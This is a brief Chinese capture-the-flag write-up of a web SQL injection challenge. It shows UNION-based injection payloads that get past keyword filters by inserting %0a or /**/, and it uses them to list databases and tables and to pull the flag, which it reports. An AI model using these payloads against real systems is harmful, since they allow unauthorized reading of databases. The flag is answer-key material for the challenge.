类型：web
网址：http://www.shiyanbar.com/ctf/1875
攻击：sql注入
一句话总结：
id有回显的sql注入（手工）

Writeup:

Union、select等被过滤，使用union%0a、select%0a代替
或者%0a用/**/替代也可以。

爆数据库名称：

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

结果：baloteli、information_schema、test、web1

爆表：

1' union%0a select%0a table_name from%0a information_schema.tables%0a where%0a '1'='1

结果有很多，找到最后几张表，发现flag表

爆flag表flag字段的数据：

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

结果两条数据，分别是baloteli、flag{Y0u_@r3_5O_dAmn_90Od}

FLAG

flag{Y0u_@r3_5O_dAmn_90Od}